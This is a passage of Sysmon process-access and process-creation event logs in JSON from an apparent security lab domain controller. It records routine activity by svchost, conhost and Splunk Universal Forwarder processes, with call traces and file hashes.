05:56:50.195","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6223,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:50.195\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0422-5F25-0000-0010AF860B00}\r\nTargetProcessId: 4012\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:50.195","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0422-5F25-0000-0010AF860B00}","TargetProcessId":"4012","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6224,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:50.946\r\nProcessGuid: {A837DB8D-0422-5F25-0000-001083880B00}\r\nProcessId: 2952\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:56:50.946","ProcessGuid":"{A837DB8D-0422-5F25-0000-001083880B00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:56:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6225,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:50.945\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0422-5F25-0000-001083880B00}\r\nTargetProcessId: 2952\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:50.945","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0422-5F25-0000-001083880B00}","TargetProcessId":"2952","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6226,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:50.945\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0422-5F25-0000-001083880B00}\r\nTargetProcessId: 2952\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:50.945","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0422-5F25-0000-001083880B00}","TargetProcessId":"2952","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6227,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:50.945\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:50.945","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6228,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:50.945\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:50.945","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6229,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:50.945\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:50.945","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6230,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:50.945\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:50.945","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6231,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:50.945\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 